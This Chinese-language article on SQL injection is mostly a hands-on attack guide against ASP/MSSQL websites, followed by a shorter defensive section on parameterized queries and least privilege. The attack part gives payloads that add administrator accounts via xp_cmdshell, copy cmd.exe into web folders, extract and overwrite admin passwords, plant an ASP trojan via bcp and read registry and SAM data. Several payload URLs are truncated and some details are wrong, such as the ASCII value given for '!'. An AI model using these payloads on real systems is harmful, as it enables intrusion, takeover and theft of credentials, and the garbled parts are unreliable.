SQL註入攻擊
·發現SQL註入位置;
·推斷後臺數據庫類型;
·確定XP_CMDSHELL可執行情況
·發現WEB虛擬文件夾
·上傳ASP木馬;
·得到管理員權限。
SQL註入攻擊的步驟
一、SQL註入漏洞的推斷
一般來說。SQL註入一般存在於形如:HTTP://xxx.xxx.xxx/abc.asp?
id=XX等帶有參數的ASP動態網頁中。有時一個動態網頁中可能僅僅有一個參數,有時可能有N個參數,有時是整型參數,有時是字符串型參數,不能一概而論。總之僅僅要是帶有參數的動態網頁且此網頁訪問了數據庫,那麽就有可能存在SQL註入。
假設ASP程序猿沒有安全意識,不進行必要的字符過濾。存在SQL註入的可能性就非常大。
為了把問題說明清楚,下面以HTTP://xxx.xxx.xxx/abc.asp?
p=YY為例進行分析。YY可能是整型,也有可能是字符串。
1、整型參數的推斷
當輸入的參數YY為整型時,通常abc.asp中SQL語句原貌大致例如以下:
select * from 表名 where 字段=YY,所以能夠用下面步驟測試SQL註入是否存在。
①HTTP://xxx.xxx.xxx/abc.asp?
p=YY’(附加一個單引號),此時abc.ASP中的SQL語句變成了
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp執行正常。並且與HTTP://xxx.xxx.xxx/abc.asp?p=YY執行結果相同。
③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp執行異常;
假設以上三步全面滿足。abc.asp中一定存在SQL註入漏洞。
2、字符串型參數的推斷
當輸入的參數YY為字符串時。通常abc.asp中SQL語句原貌大致例如以下:
select * from 表名 where 字段=‘YY‘,所以能夠用下面步驟測試SQL註入是否存在。
①HTTP://xxx.xxx.xxx/abc.asp?
p=YY’(附加一個單引號)。此時abc.ASP中的SQL語句變成了
select * from 表名 where 字段=YY’,abc.asp執行異常;
②HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1‘=‘1‘, abc.asp執行正常。並且與HTTP://xxx.xxx.xxx/abc.asp?p=YY執行結果相同;
③HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1‘=‘2‘, abc.asp執行異常;
假設以上三步全面滿足,abc.asp中一定存在SQL註入漏洞。
3、特殊情況的處理
有時ASP程序猿會在程序猿過濾掉單引號等字符,以防止SQL註入。
此時能夠用下面幾種方法試一試。
①大小定混合法:由於VBS並不區分大寫和小寫,而程序猿在過濾時通常要麽全部過濾大寫字符串。要麽全部過濾小寫字符串,而大寫和小寫混合往往會被忽視。如用SelecT取代select,SELECT等;
②UNICODE法:在IIS中。以UNICODE字符集實現國際化,我們全然能夠IE中輸入的字符串化成UNICODE字符串進行輸入。如+ =%2B,空格=%20 等。URLEncode信息參見附件一。
③ASCII碼法:能夠把輸入的部分或全部字符全部用ASCII碼取代,如U=chr(85),a=chr(97)等。ASCII信息參見附件二;
二、分析數據庫server類型
一般來說。ACCESS與SQL-SERVER是最經常使用的數據庫server,雖然它們都支持T-SQL標準,但還有不同之處。並且不同的數據庫有不同的攻擊方法。必須要差別對待。
1、 利用數據庫server的系統變量進行區分
SQL-SERVER有user,db_name()等系統變量,利用這些系統值不僅能夠推斷SQL-SERVER。並且還能夠得到大量實用信息。如:
① HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不僅能夠推斷是否是SQL-SERVER,而還能夠得到當前連接到數據庫的username
②HTTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不僅能夠推斷是否是SQL-SERVER,而還能夠得到當前正在使用的數據庫名。
2、利用系統表
ACCESS的系統表是msysobjects,且在WEB環境下沒有訪問權限。而SQL-SERVER的系統表是sysobjects,在WEB環境下有訪問權限。對於下面兩條語句:
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
②HTTP://xxx.xxx.xxx/abc.asp?
p=YY and (select count(*) from msysobjects)>0
若數據庫是SQL-SERVE。則第一條,abc.asp一定執行正常。第二條則異常;若是ACCESS則兩條都會異常。
3、 MSSQL三個關鍵系統表
sysdatabases系統表:Microsoft SQL Server 上的每一個數據庫在表中占一行。最初安裝 SQL Server 時,sysdatabases 包括 master、model、msdb、mssqlweb 和 tempdb 數據庫的項。該表僅僅存儲在 master 數據庫中。 這個表保存在master數據庫中。這個表中保存的是什麽信息呢?這個非常重要。他是 保存了全部的庫名,以及庫的ID和一些相關信息。
這裏我把對於我們實用的字段名稱和相關說明給大家列出來。name //表示庫的名字。
dbid //表示庫的ID。dbid從1到5是系統的。各自是:master、model、msdb、mssqlweb、tempdb 這五個庫。用select * from master.dbo.sysdatabases 就能夠查詢出全部的庫名。
Sysobjects:SQL-SERVER的每一個數據庫內都有此系統表。它存放該數據庫內創建的全部對象。如約束、默認值、日誌、規則、存儲過程等,每一個對象在表中占一行。
syscolumns:每一個表和視圖中的每列在表中占一行,存儲過程中的每一個參數在表中也占一行。該表位於每一個數據庫中。主要字段有:
name ,id。 colid :各自是字段名稱。表ID號,字段ID號,當中的 ID 是 剛上我們用sysobjects得到的表的ID號。
用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個庫中,表的ID是123456789中的全部字段列表。
三、確定XP_CMDSHELL可執行情況
若當前連接數據的帳號具有SA權限,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程能夠直接使用操作系統的shell)能夠正確執行。則整個計算機能夠通過下面幾種方法全然控制,以後的全部步驟都能夠省
1、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp執行異常但能夠得到當前連接數據庫的username(若顯示dbo則代表SA)。
2、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執行異常但能夠得到當前連接的數據庫名。
3、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主數據庫。名中的分號表示SQL-SERVER執行完分號前的語句名,繼續執行其後面的語句;“—”號是註解,表示其後面的全部內容僅為凝視,系統並不執行)能夠直接添加操作系統帳戶aaa,password為bbb。
4、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛添加的帳戶aaa加到administrators組中。
5、HTTP://xxx.xxx.xxx/abc.asp?
p=YY;backuup database 數據庫名 to disk=‘c:\inetpub\wwwroot\save.db‘ 則把得到的數據內容全部備份到WEB文件夾下,再用HTTP把此文件下載(當然首選要知道WEB虛擬文件夾)。
6、通過復制CMD創建UNICODE漏洞
HTTP://xxx.xxx.xxx/abc.asp?
p=YY;exe ... dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe” 便制造了一個UNICODE漏洞。通過此漏洞的利用方法。便完畢了對整個計算機的控制(當然首選要知道WEB虛擬文件夾)。
四、發現WEB虛擬文件夾
僅僅有找到WEB虛擬文件夾。才幹確定放置ASP木馬的位置,進而得到USER權限。
有兩種方法比較有效。
一是依據經驗猜解,一般來說,WEB虛擬文件夾是:c:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot等,而可執行虛擬文件夾是:c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。
二是遍歷系統的文件夾結構,分析結果並發現WEB虛擬文件夾。
先創建一個暫時表:temp
HTTP://xxx.xxx.xxx/abc.asp?
p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
接下來:
(1)利用xp_availablemedia來獲得當前全部驅動器,並存入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
我們能夠通過查詢temp的內容來獲得驅動器列表及相關信息
(2)利用xp_subdirs獲得子文件夾列表,並存入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?
p=YY;insert into temp(i ... dbo.xp_subdirs ‘c:\‘;--
(3)利用xp_dirtree獲得全部子文件夾的文件夾樹結構,並寸入temp表中:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\‘;--
註意:
1、以上每完畢一項瀏覽後。應刪除TEMP中的全部內容,刪除方法是:
HTTP://xxx.xxx.xxx/abc.asp?
p=YY;delete from temp;--
2、瀏覽TEMP表的方法是:(假設TestDB是當前連接的數據庫名)
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一條記錄id字段的值,並與整數進行比較,顯然abc.asp工作異常,但在異常中卻能夠發現id字段的值。假設發現的表名是xyz,則
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in(‘xyz‘))>0 得到表TEMP中第二條記錄id字段的值。
五、上傳ASP木馬
所謂ASP木馬,就是一段有特殊功能的ASP代碼,並放入WEB虛擬文件夾的Scripts下。遠程客戶通過IE就可執行它,進而得到系統的USER權限,實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法:
1、利用WEB的遠程管理功能
很多WEB站點,為了維護的方便。都提供了遠程管理的功能。也有不少WEB站點,其內容是對於不同的用戶有不同的訪問權限。為了達到對用戶權限的控制,都有一個網頁。要求username與password,僅僅有輸入了正確的值,才幹進行下一步的操作,能夠實現對WEB的管理,如上傳、下載文件,文件夾瀏覽、改動配置等。
因此,若獲取正確的username與password,不僅能夠上傳ASP木馬,有時甚至能夠直接得到USER權限而瀏覽系統,上一步的“發現WEB虛擬文件夾”的復雜操作都可省略。
username及password一般存放在一張表中。發現這張表並讀取當中內容便攻克了問題。下面給出兩種有效方法。
A、 註入法:
從理論上說。認證網頁中會有型如:
select * from admin where username=‘XXX‘ and password=‘YYY‘ 的語句,若在正式執行此句之前,沒有進行必要的字符過濾,則非常easy實施SQL註入。
如在username文本框內輸入:abc’ or 1=1-- 在password框內輸入:123 則SQL語句變成:
select * from admin where username=‘abc’ or 1=1 and password=‘123’ 無論用戶輸入不論什麽username與password,此語句永遠都能正確執行,用戶輕易騙過系統,獲取合法身份。
B、猜解法:
基本思路是:猜解全部數據庫名稱,猜出庫中的每張表名。分析可能是存放username與password的表名,猜出表中的每一個字段名。猜出表中的每條記錄內容。
猜解全部數據庫名稱
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 由於 dbid 的值從1到5,是系統用了。所以用戶自己建的一定是從6開始的。並且我們提交了 name>1 (name字段是一個字符型的字段和數字比較會出錯),abc.asp工作異常,可得到第一個數據庫名。同理把DBID分別改成7,8。9,10,11,12…就可得到全部數據庫名。
下面假設得到的數據庫名是TestDB。
猜解數據庫中username表的名稱
猜解法:此方法就是依據個人的經驗猜表名,一般來說。user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。
並通過語句進行推斷
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在,則abc.asp工作正常,否則異常。如此循環。直到猜到系統帳號表的名稱。
讀取法:SQL-SERVER有一個存放系統核心信息的表sysobjects,有關一個庫的全部表。視圖等信息全部存放在此表中。並且此表能夠通過WEB進行訪問。
當xtype=‘U‘ and status>0代表是用戶建立的表,發現並分析每一個用戶建立的表及名稱,便能夠得到username表的名稱。主要的實現方法是:
①HTTP://xxx.xxx.xxx/abc.asp?
p=YY and (select top 1 name from TestD ... type=‘U‘ and status>0 )>0 得到第一個用戶建立表的名稱。並與整數進行比較,顯然abc.asp工作異常,但在異常中卻能夠發現表的名稱。假設發現的表名是xyz,則
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in(‘xyz‘))>0 能夠得到第二個用戶建立的表的名稱。同理就可得到全部用建立的表的名稱。
依據表的名稱。一般能夠認定那張表用戶存放username及password,下面假設此表名為Admin。
l 猜解username字段及password字段名稱
admin表中一定有一個username字段。也一定有一個password字段。僅僅有得到此兩個字段的名稱,才有可能得到此兩字段的內容。
怎樣得到它們的名稱呢,相同有下面兩種方法。
猜解法:此方法就是依據個人的經驗猜字段名,一般來說,username字段的名稱經常使用:username,name,user,account等。而password字段的名稱經常使用:password,pass,pwd,passwd等。並通過語句進行推斷
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(字段名) from TestDB.dbo.admin)>0 “select count(字段名) from 表名”語句得到表的行數,所以若字段名存在。則abc.asp工作正常。否則異常。如此循環,直到猜到兩個字段的名稱。
讀取法:主要的實現方法是
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id(‘admin‘),1) from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id(‘admin‘),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個字段名,當與整數進行比較,顯然abc.asp工作異常,但在異常中卻能夠發現字段的名稱。
把col_name(object_id(‘admin‘),1)中的1依次換成2,3,4,5,6…就可得到全部的字段名稱。
l 猜解username與password
猜username與password的內容最經常使用也是最有效的方法有:
ASCII碼逐字解碼法:雖然這樣的方法速度較慢。但肯定是可行的。
主要的思路是先猜出字段的長度,然後依次猜出每一位的值。
猜username與猜password的方法相同,下面以猜username為例說明其過程。
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from TestDB.dbo.admin)=X(X=1,2,3,4,5,… n。username為username字段的名稱。admin為表的名稱)。若x為某一值i且abc.asp執行正常時,則i就是第一個username的長度。如:當輸入
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from TestDB.dbo.admin)=8時abc.asp執行正常。則第一個username的長度為8
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的username長度之間,當m=1,2,3,…時推測分別推測第1,2,3,…位的值。n的值是1~9、a~z、A~Z的ASCII值,也就是1~128之間的隨意值;admin為系統用戶帳號表的名稱),若n為某一值i且abc.asp執行正常時,則i相應ASCII碼就是username某一位值。
如:當輸入
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時abc.asp執行正常。則username的第三位為P(P的ASCII為80)。
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時abc.asp執行正常。則username的第9位為!(!的ASCII為80)。
猜到第一個username及password後。同理,能夠猜出其它全部username與password。註意:有時得到的password可能是經MD5等方式加密後的信息,還須要用專用工具進行脫密。或者先改其password。使用完後再改回來,見下面說明。
簡單法:猜username用
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1) , flag是admin表中的一個字段,username是username字段,此時abc.asp工作異常。但能得到Username的值。與上相同的方法。能夠得到第二username,第三個用戶等等。直到表中的全部username。
猜用戶password:HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ... B.dbo.admin where pwd>1) , flag是admin表中的一個字段,pwd是password字段,此時abc.asp工作異常,但能得到pwd的值。與上相同的方法。能夠得到第二username的password,第三個用戶的password等等,直到表中的全部用戶的password。password有時是經MD5加密的,能夠改password。
HTTP://xxx.xxx.xxx/abc.asp?
p=YY;update TestDB.dbo.admin set pwd=‘ ... where username=‘www‘;-- ( 1的MD5值為:AAABBBCCCDDDEEEF,即把password改成1。www為已知的username)
用相同的方法當然可把password改原來的值。
2、利用表內容導成文件功能
SQL有BCP命令,它能夠把表的內容導成文本文件並放到指定位置。利用這項功能。我們能夠先建一張暫時表。然後在表中一行一行地輸入一個ASP木馬,然後用BCP命令導出形成ASP文件。
命令行格式例如以下:
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P foobar (‘S‘參數為執行查詢的server,‘U‘參數為username。‘P‘參數為password,終於上傳了一個runcommand.asp的木馬)
六、得到系統的管理員權限
ASP木馬僅僅有USER權限。要想獲取對系統的全然控制,還要有系統的管理員權限。怎麽辦?提升權限的方法有非常多種:
上傳木馬。改動開機自己主動執行的.ini文件(它一重新啟動。便死定了)。
復制CMD.exe到scripts。人為制造UNICODE漏洞。
下載SAM文件,破解並獲取OS的全部usernamepassword;
等等,視系統的具體情況而定,能夠採取不同的方法。
七、幾個SQL-SERVER專用手段
1、利用xp_regread擴展存儲過程改動註冊表
[xp_regread]還有一個實用的內置存儲過程是xp_regXXXX類的函數集合(Xp_regaddmultistring。Xp_regdeletekey,Xp_regdeletevalue,Xp_regenumkeys。Xp_regenumvalues,Xp_regread,Xp_regremovemultistring,Xp_regwrite)。攻擊者能夠利用這些函數改動註冊表,如讀取SAM值。同意建立空連接,開機自己主動執行程序等。如:
exec xp_regread HKEY_LOCAL_MACHINE,‘SYSTEM\CurrentControlSet\Services\lanmanserver\parameters‘, ‘nullsessionshares‘ 確定什麽樣的會話連接在server可用。
exec xp_regenumvalues HKEY_LOCAL_MACHINE,‘SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities‘ 顯示server上全部SNMP團體配置,有了這些信息,攻擊者也許會又一次配置同一網絡中的網絡設備。
2、利用其它存儲過程去改變server
xp_servicecontrol過程同意用戶啟動。停止服務。如:
(exec master..xp_servicecontrol ‘start‘,‘schedule‘
exec master..xp_servicecontrol ‘start‘,‘server‘)
Xp_availablemedia 顯示機器上實用的驅動器
Xp_dirtree 同意獲得一個文件夾樹
Xp_enumdsn 列舉server上的ODBC數據源
Xp_loginconfig 獲取server安全信息
Xp_makecab 同意用戶在server上創建一個壓縮文件
Xp_ntsec_enumdomains 列舉server能夠進入的域
Xp_terminate_process 提供進程的進程ID。終止此進程
SQL註入攻擊的背景
在計算機技術快速發展的今天,越來越讓人們頭疼的是面臨越來越“變態”和復雜的威脅站點技術。他們利用Internet 執行各種惡意活動。如身份竊取、私密信息竊取、帶寬資源占用等。它們潛入之後。還會擴散並不斷更新自己。這些活動經常利用用戶的好奇心,在用戶不知道或未來同意的情況下潛入用戶的PC,不知不覺中,帳戶裏的資金就被轉移了,公司訊息也被傳送出去,危害十分嚴重。
2006年8月16日。第一個Web威脅樣本出現,截止到2006年10月25日,已經產生了第150個變種。並且,還在不斷地演化下去。
站點威脅的目標定位有多個維度,是個人還是公司,還是某種行業,都有其考慮,甚至國家、地區、性別、種族、宗教等也成為發動攻擊的原因或動機。
攻擊還會採用多種形態,甚至是復合形態。比方病毒、蠕蟲、特洛伊、間諜軟件、僵屍、網絡釣魚電子郵件、漏洞利用、下載程序、社會project、rootkit、黑客。結果都能夠導致用戶信息受到危害,或者導致用戶所需的服務被拒絕和劫持。
從其來源說Web威脅還能夠分為內部攻擊和外部攻擊兩類。
前者主要來自信任網絡,可能是用戶執行了未授權訪問或是無意中定制了惡意攻擊;後者主要是由於網絡漏洞被利用或者用戶受到惡意程序制定者的專一攻擊。
SQL註入攻擊的網絡分析
SQL註入攻擊是非常令人討厭的安全漏洞,是全部的web開發者。無論是什麽平臺。技術。還是數據層,須要確信他們理解和防止的東西。不幸的是,開發者往往不集中花點時間在這上面,以至他們的應用,更糟糕的是。他們的客戶極其easy受到攻擊。
Michael Sutton 近期發表了一篇非常發人深省的帖子,講述在公共網上這問題是多麽地普遍。他用Google的Search API建了一個C#的client程序,尋找那些易受SQL 註入攻擊的站點。其步驟非常簡單:
1,尋找那些帶查詢字符串的站點(比如。查詢那些在URL裏帶有 "id=" 的URL)
2,給這些確定為動態的站點發送一個請求,改變當中的id=語句,帶一個額外的單引號,來試圖取消當中的SQL語句(比如,如 id=6‘ )
3。分析返回的回復,在當中查找象“SQL” 和“query”這樣的詞,這往往表示應用返回了具體的錯誤消息(這本身也是非常糟糕的)
4,檢查錯誤消息是否表示發送到SQLserver的參數沒有被正確加碼(encoded),假設如此,那麽表示可對該站點進行SQL註入攻擊
對通過Google搜尋找到的1000個站點的隨機取樣測試。他檢測到當中的11.3%有易受SQL註入攻擊的可能。這非常。非常地可怕。
這意味著黑客能夠遠程利用那些應用裏的數據,獲取不論什麽沒有hashed或加密的password或信用卡數據。甚至有以管理員身份登陸進這些應用的可能。這不僅對開發站點的開發者來說非常糟糕,並且對使用站點的消費者或用戶來說更糟糕,由於他們給站點提供了數據。想著站點是安全的呢。
那麽SQL註入攻擊究竟是什麽玩意?
有幾種情形使得SQL註入攻擊成為可能。
最常見的原因是,你動態地構造了SQL語句,卻沒有使用正確地加了碼(encoded)的參數。譬如。考慮這個SQL查詢的編碼。其目的是依據由查詢字符串提供的社會保險號碼(social security number)來查詢作者(Authors):
Dim SSN as String
Dim SqlQuery as String
SSN = Request.QueryString("SSN")
SqlQuery = "SELECT au_lname, au_fname FROM authors WHERE au_id = ‘" + SSN + "‘"
假設你有象上面這個片斷一樣的SQL編碼。那麽你的整個數據庫和應用能夠遠程地被黑掉。怎麽會呢?在普通情形下,用戶會使用一個社會保險號碼來訪問這個站點,編碼是象這樣執行的:
‘ URL to the page containing the above code
http://mysite.com/listauthordetails.aspx?SSN=172-32-9999
‘ SQL Query executed against the database
SELECT au_lname, au_fname FROM authors WHERE au_id = ‘172-32-9999‘
這是開發者預期的做法,通過社會保險號碼來查詢數據庫中作者的信息。
但由於參數值沒有被正確地加碼。黑客能夠非常easy地改動查詢字符串的值,在要執行的值後面嵌入附加的SQL語句 。
譬如。
‘ URL to the page containing the above code
http://mysite.com/listauthordetails.aspx?
SSN=172-32-9999‘;DROP DATABASE pubs --
‘ SQL Query executed against the database
SELECT au_lname, au_fname FROM authors WHERE au_id = ‘‘;DROP DATABASE pubs --
註意到沒有,能夠在SSN查詢字符串值的後面加入“ ‘;DROP DATABASE pubs -- ”,通過 “;”字符來終止當前的SQL語句,然後加入了自己的惡意的SQL語句,然後把語句的其它部分用“--”字符串凝視掉。
由於是手工在編碼裏構造SQL語句,最後把這個字符串傳給了數據庫,數據庫會先對authors表進行查詢,然後把我們的pubs數據庫刪除。“砰(bang)”的一聲,數據庫就沒了!
萬一你覺得匿名黑客刪除你的數據庫的結果非常壞,但不幸的是,實際上,這在SQL註入攻擊所涉及的情形中算是比較好的。一個黑客能夠不單純摧毀數據,而是使用上面這個編碼的弱點,執行一個JOIN語句。來獲取你數據庫裏的全部數據,顯示在頁面上,同意他們獲取username,password,信用卡號碼等等。他們也能夠加入 UPDATE/INSERT 語句改變產品的價格,加入新的管理員賬號,真的搞砸你(screw up your life)呢。
想象一下,到月底檢查庫存時,發現你庫房裏的實際產品數與你的賬目系統(accounting system)匯報的數目有所不同。
怎樣防範SQL註入攻擊
SQL註入攻擊是你須要操心的事情,無論你用什麽web編程技術。再說全部的web框架都須要操心這個的。
你須要遵循幾條非常主要的規則:
1)在構造動態SQL語句時,一定要使用類安全(type-safe)的參數加碼機制。
大多數的數據API。包括ADO和ADO.NET,有這樣的支持,同意你指定所提供的參數的確切類型(譬如。字符串,整數,日期等)。能夠保證這些參數被恰當地escaped/encoded了,來避免黑客利用它們。一定要從始到終地使用這些特性。
比如,在ADO.NET裏對動態SQL,你能夠象下面這樣重寫上述的語句。使之安全:
Dim SSN as String = Request.QueryString("SSN")
Dim cmd As new SqlCommand("SELECT au_lname, au_fname FROM authors WHERE au_id = @au_id")
Dim param = new SqlParameter("au_id", SqlDbType.VarChar)
param.Value = SSN
cmd.Parameters.Add(param)
這將防止有人試圖偷偷註入另外的SQL表達式(由於ADO.NET知道對au_id的字符串值進行加碼),以及避免其它數據問題(譬如不對地轉換數值類型等)。註意,VS 2005內置的TableAdapter/DataSet設計器自己主動使用這個機制。ASP.NET 2.0數據源控件也是如此。
一個常見的錯誤知覺(misperception)是。假如你使用了存儲過程或ORM,你就全然不受SQL註入攻擊之害了。
這是不對的,你還是須要確定在給存儲過程傳遞數據時你非常慎重。或在用ORM來定制一個查詢時,你的做法是安全的。
2) 在部署你的應用前。始終要做安全審評(security review)。建立一個正式的安全過程(formal security process),在每次你做更新時,對全部的編碼做審評。後面一點特別重要。
非常多次我聽說開發隊伍在正式上線(going live)前會做非常具體的安全審評,然後在幾周或幾個月之後他們做一些非常小的更新時,他們會跳過安全審評這關。推說。“就是一個小小的更新,我們以後再做編碼審評好了”。請始終堅持做安全審評。
3) 千萬別把敏感性數據在數據庫裏以明文存放。我個人的意見是,password應該總是在單向(one-way )hashed過後再存放,我甚至不喜歡將它們在加密後存放。在默認設置下,ASP.NET 2.0 Membership API 自己主動為你這麽做,還同一時候實現了安全的SALT 隨機化行為(SALT randomization behavior)。假設你決定建立自己的成員數據庫,我建議你查看一下我們在這裏發表的我們自己的Membership provider的源代碼。同一時候也確定對你的數據庫裏的信用卡和其它的私有數據進行了加密。這樣即使你的數據庫被人入侵(compromised)了的話,起碼你的客戶的私有數據不會被人利用。
4)確認你編寫了自己主動化的單元測試。來特別校驗你的數據訪問層和應用程序不受SQL註入攻擊。
這麽做是非常重要的,有助於捕捉住(catch)“就是一個小小的更新,全部不會有安全問題”的情形帶來的疏忽,來提供額外的安全層以避免偶然地引進壞的安全缺陷到你的應用裏去。
5)鎖定你的數據庫的安全,僅僅給訪問數據庫的web應用功能所需的最低的權限。假設web應用不須要訪問某些表,那麽確認它沒有訪問這些表的權限。假設web應用僅僅須要僅僅讀的權限從你的account payables表來生成報表。那麽確認你禁止它對此表的 insert/update/delete 的權限。
6)非常多新手從網上下載SQL通用防註入系統的程序,在須要防範註入的頁面頭部用 來防止別人進行手動註入測試(。
可是假設通過SQL註入分析器就可輕松跳過防註入系統並自己主動分析其註入點。
然後僅僅須要幾分鐘。你的管理員賬號及password就會被分析出來。
7)對於註入分析器的防範,筆者通過實驗,發現了一種簡單有效的防範方法。首先我們要知道SQL註入分析器是怎樣工作的。
在操作過程中,發現軟件並非沖著“admin”管理員賬號去的,而是沖著權限(如flag=1)去的。這樣一來,無論你的管理員賬號怎麽變都無法逃過檢測。
第三步:既然無法逃過檢測,那我們就做兩個賬號。一個是普通的管理員賬號。一個是防止註入的賬號,為什麽這麽說呢?筆者想,假設找一個權限最大的賬號制造假象,吸引軟件的檢測,而這個賬號裏的內容是大於千字以上的中文字符。就會迫使軟件對這個賬號進行分析的時候進入全負荷狀態甚至資源耗盡而死機。下面我們就來改動數據庫吧。
1.對表結構進行改動。將管理員的賬號字段的數據類型進行改動,文本型改成最大字段255(事實上也夠了。假設還想做得再大點。能夠選擇備註型)。password的字段也進行相同設置。
2.對表進行改動。設置管理員權限的賬號放在ID1,並輸入大量中文字符(最好大於100個字)。
3.把真正的管理員password放在ID2後的不論什麽一個位置(如放在ID549上)。
由於SQL註入攻擊針對的是應用開發過程中的編程不嚴密。因而對於絕大多數防火墻來說,這樣的攻擊是“合法”的。問題的解決僅僅有依賴於完好編程。專門針對SQL註入攻擊的工具較少,Wpoison對於用asp,php進行的開發有一定幫助...。
SQL註入攻擊